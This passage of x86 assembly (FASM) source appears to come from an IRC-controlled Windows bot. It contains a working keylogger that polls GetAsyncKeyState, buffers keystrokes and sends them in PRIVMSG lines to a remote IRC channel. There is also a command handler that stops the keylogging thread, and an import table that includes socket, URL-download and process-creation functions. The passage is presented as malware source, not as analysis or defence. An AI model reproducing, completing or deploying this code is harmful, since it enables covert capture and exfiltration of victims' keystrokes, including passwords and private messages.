dword [ThreadHandle],\ ;thread handle
|
||
ThreadExitCode ;store it here
|
||
|
||
invoke TerminateThread,\ ;exit it now
|
||
dword [ThreadHandle],\ ;handle
|
||
dword [ThreadExitCode] ;with this
|
||
|
||
cmp eax, 0 ;error?
|
||
je ExitThreadError ;show it then
|
||
|
||
mov dword [ThreadId], 0 ;clear id
|
||
mov dword [ThreadHandle], 0 ;clear handle
|
||
mov dword [ThreadExitCode], 0 ;clear exit code
|
||
|
||
invoke lstrcpy,\ ;copy sucess message
|
||
ReturnBuffer,\ ;to buffer
|
||
"keylogging thread terminated" ;msg
|
||
|
||
call SendPrivmsg ;send it
|
||
jmp ExecuteCommandReturn ;ret
|
||
|
||
ExitThreadError: ;arghh, maybe not exist
|
||
invoke lstrcpy,\ ;copy error message
|
||
ReturnBuffer,\ ;to buffer
|
||
"error terminating keylogging thread" ;msg
|
||
|
||
call SendPrivmsg ;send it
|
||
jmp ExecuteCommandReturn ;ret
|
||
|
||
ExecuteCommandReturn: ;return
|
||
ret ;return to call
|
||
|
||
|
||
ExtractParameters: ;this procedure extracts two parameter from a cmd
|
||
mov edx, CommandBuffer ;pointer to buffer
|
||
mov ecx, 0 ;zero counter
|
||
|
||
FindCut: ;get the "|" cur
|
||
cmp byte [edx + ecx], "|" ;is byte at position a "|"?
|
||
je HaveCut ;then extract it
|
||
|
||
inc ecx ;counter + 1
|
||
jmp FindCut ;scan next position
|
||
|
||
HaveCut: ;have cut, extract it
|
||
add edx, ecx ;add counter to start of buffer
|
||
mov byte [edx - 1], 0 ;zero the "|"
|
||
add edx, 2d ;skip space
|
||
|
||
invoke lstrcpy,\ ;copy parameter2
|
||
Parameter2,\ ;destination
|
||
edx ;source
|
||
|
||
invoke lstrlen,\ ;get length to erase crlf
|
||
Parameter2 ;of buffer
|
||
|
||
mov byte [Parameter2 + eax - 1], 0 ;erase crlf
|
||
|
||
invoke lstrcpy,\ ;copy parameter1
|
||
Parameter1,\ ;buffer
|
||
CommandBuffer ;source
|
||
ret ;return to call
|
||
|
||
|
||
LiveKeylog: ;this procedure logs keys and send it to channel
|
||
invoke lstrlen,\ ;get legth of buffer
|
||
KeylogBuffer ;key strokes buffer
|
||
|
||
cmp eax, 50d ;is over 50 characters?
|
||
jae SendKeyLine ;then send it to channel
|
||
|
||
mov ebx, 0 ;set counter to zero (just use ebx because api dont change it
|
||
|
||
NextKey: ;try if next key is pressed
|
||
cmp ebx, 255d ;end of possible keys?
|
||
je LiveKeylog ;the try from start again
|
||
|
||
invoke GetAsyncKeyState,\ ;get status of this key
|
||
ebx ;in ebx (0 - 255)
|
||
|
||
cmp eax, -32767d ;is pressed?
|
||
jne ScanNextKey ;if not check next possible key
|
||
|
||
cmp ebx, 20h ;VK_SPACE
|
||
je IsSpace ;if it is this key, jump there
|
||
|
||
cmp ebx, 8h ;VK_BACK
|
||
je IsBack ;if it is this key, jump there
|
||
|
||
cmp ebx, 9h ;VK_TAB
|
||
je IsTab ;if it is this key, jump there
|
||
|
||
cmp ebx, 60h ;VK_NUMPAD0
|
||
je IsNumpad0 ;if it is this key, jump there
|
||
|
||
cmp ebx, 61h ;VK_NUMPAD1
|
||
je IsNumpad1 ;if it is this key, jump there
|
||
|
||
cmp ebx, 62h ;VK_NUMPAD2
|
||
je IsNumpad2 ;if it is this key, jump there
|
||
|
||
cmp ebx, 63h ;VK_NUMPAD3
|
||
je IsNumpad3 ;if it is this key, jump there
|
||
|
||
cmp ebx, 64h ;VK_NUMPAD4
|
||
je IsNumpad4 ;if it is this key, jump there
|
||
|
||
cmp ebx, 65h ;VK_NUMPAD5
|
||
je IsNumpad5 ;if it is this key, jump there
|
||
|
||
cmp ebx, 66h ;VK_NUMPAD6
|
||
je IsNumpad6 ;if it is this key, jump there
|
||
|
||
cmp ebx, 67h ;VK_NUMPAD7
|
||
je IsNumpad7 ;if it is this key, jump there
|
||
|
||
cmp ebx, 68h ;VK_NUMPAD8
|
||
je IsNumpad8 ;if it is this key, jump there
|
||
|
||
cmp ebx, 69h ;VK_NUMPAD9
|
||
je IsNumpad9 ;if it is this key, jump there
|
||
|
||
cmp ebx, 0Dh ;VK_RETURN
|
||
je IsReturn ;if it is this key, jump there
|
||
|
||
cmp ebx, 30h ;VK_0
|
||
jae CheckIsKey ;if its above "1" its possible key
|
||
|
||
ScanNextKey: ;check next key if its pressed
|
||
inc ebx ;increase counter by one
|
||
jmp NextKey ;check it baby
|
||
|
||
CheckIsKey:
|
||
cmp ebx, 5Ah ;VK_Z
|
||
jbe IsKey ;is key from 1 - Z
|
||
|
||
jmp ScanNextKey ;nop, scan next one
|
||
|
||
IsSpace: ;cat other key to buffer
|
||
invoke lstrcat,\
|
||
KeylogBuffer,\
|
||
" "
|
||
|
||
jmp LiveKeylog
|
||
|
||
IsBack: ;cat other key to buffer
|
||
invoke lstrcat,\
|
||
KeylogBuffer,\
|
||
"{back}"
|
||
|
||
jmp LiveKeylog
|
||
|
||
IsTab: ;cat other key to buffer
|
||
invoke lstrcat,\
|
||
KeylogBuffer,\
|
||
"{tab}"
|
||
|
||
jmp LiveKeylog
|
||
|
||
IsNumpad0: ;cat other key to buffer
|
||
invoke lstrcat,\
|
||
KeylogBuffer,\
|
||
"0"
|
||
|
||
jmp LiveKeylog
|
||
|
||
IsNumpad1: ;cat other key to buffer
|
||
invoke lstrcat,\
|
||
KeylogBuffer,\
|
||
"1"
|
||
|
||
jmp LiveKeylog
|
||
|
||
IsNumpad2: ;cat other key to buffer
|
||
invoke lstrcat,\
|
||
KeylogBuffer,\
|
||
"2"
|
||
|
||
jmp LiveKeylog
|
||
|
||
IsNumpad3: ;cat other key to buffer
|
||
invoke lstrcat,\
|
||
KeylogBuffer,\
|
||
"3"
|
||
|
||
jmp LiveKeylog
|
||
|
||
IsNumpad4: ;cat other key to buffer
|
||
invoke lstrcat,\
|
||
KeylogBuffer,\
|
||
"4"
|
||
|
||
jmp LiveKeylog
|
||
|
||
IsNumpad5: ;cat other key to buffer
|
||
invoke lstrcat,\
|
||
KeylogBuffer,\
|
||
"5"
|
||
|
||
jmp LiveKeylog
|
||
|
||
IsNumpad6: ;cat other key to buffer
|
||
invoke lstrcat,\
|
||
KeylogBuffer,\
|
||
"6"
|
||
|
||
jmp LiveKeylog
|
||
|
||
IsNumpad7: ;cat other key to buffer
|
||
invoke lstrcat,\
|
||
KeylogBuffer,\
|
||
"7"
|
||
|
||
jmp LiveKeylog
|
||
|
||
IsNumpad8: ;cat other key to buffer
|
||
invoke lstrcat,\
|
||
KeylogBuffer,\
|
||
"8"
|
||
|
||
jmp LiveKeylog
|
||
|
||
IsNumpad9: ;cat other key to buffer
|
||
invoke lstrcat,\
|
||
KeylogBuffer,\
|
||
"9"
|
||
|
||
jmp LiveKeylog
|
||
|
||
IsReturn: ;cat other key to buffer
|
||
invoke lstrcat,\
|
||
KeylogBuffer,\
|
||
"{crlf}"
|
||
|
||
jmp LiveKeylog
|
||
|
||
IsKey: ;cat key to buffer
|
||
mov dword [ByteBuffer], ebx ;key is in ebx
|
||
|
||
invoke lstrcat,\ ;append it to the keylog buffer
|
||
KeylogBuffer,\ ;to this
|
||
ByteBuffer ;the logged key
|
||
|
||
jmp LiveKeylog ;log next key
|
||
|
||
SendKeyLine:
|
||
invoke lstrcpy,\ ;send complete line to channel
|
||
SendBuffer,\ ;copy to send buffer
|
||
"PRIVMSG " ;irc command
|
||
|
||
invoke lstrcat,\ ;append channel
|
||
SendBuffer,\ ;to buffer
|
||
Channel ;this
|
||
|
||
invoke lstrcat,\ ;cat :
|
||
SendBuffer,\ ;to buffer
|
||
" :" ;guess
|
||
|
||
invoke lstrcat,\ ;append logged buffer
|
||
SendBuffer,\ ;to send buffer
|
||
KeylogBuffer ;from here
|
||
|
||
call SendLine ;send line to irc server
|
||
|
||
mov dword [KeylogBuffer], 0 ;empty buffer
|
||
jmp LiveKeylog ;log next
|
||
|
||
ret ;return to call
|
||
|
||
|
||
section '.idata' import data readable writeable ;imports
|
||
library kernel, "kernel32.dll",\
|
||
winsock, "ws2_32.dll",\
|
||
user, "user32.dll",\
|
||
advapi, "advapi32.dll",\
|
||
wininet, "wininet.dll"
|
||
|
||
import kernel,\
|
||
lstrcpy, "lstrcpyA",\
|
||
lstrcpyn, "lstrcpynA",\
|
||
lstrcat, "lstrcatA",\
|
||
lstrcmp, "lstrcmpA",\
|
||
lstrlen, "lstrlenA",\
|
||
GetTickCount, "GetTickCount",\
|
||
Sleep, "Sleep",\
|
||
CreateFile, "CreateFileA",\
|
||
WriteFile, "WriteFile",\
|
||
CloseHandle, "CloseHandle",\
|
||
CreateProcess, "CreateProcessA",\
|
||
CreateThread, "CreateThread",\
|
||
GetExitCodeThread, "GetExitCodeThread",\
|
||
TerminateThread, "TerminateThread",\
|
||
GetSystemDirectory, "GetSystemDirectoryA",\
|
||
ExitProcess, "ExitProcess"
|
||
|
||
import winsock,\
|
||
WSAStartup, "WSAStartup",\
|
||
socket, "socket",\
|
||
inet_addr, "inet_addr",\
|
||
htons, "htons",\
|
||
connect, "connect",\
|
||
recv, "recv",\
|
||
send, "send",\
|
||
WSACleanup, "WSACleanup"
|
||
|
||
import advapi,\
|
||
GetUserName, "GetUserNameA"
|
||
|
||
import user,\
|
||
CharLowerBuff, "CharLowerBuffA",\
|
||
MessageBox, "MessageBoxA",\
|
||
GetAsyncKeyState, "GetAsyncKeyState"
|
||
|
||
import wininet,\
|
||
InternetOpen, "InternetOpenA",\
|
||
InternetOpenUrl, "InternetOpenUrlA",\
|
||
InternetReadFile, "InternetReadFile",\
|
||
InternetCloseHandle, "InternetCloseHandle"
|
||
|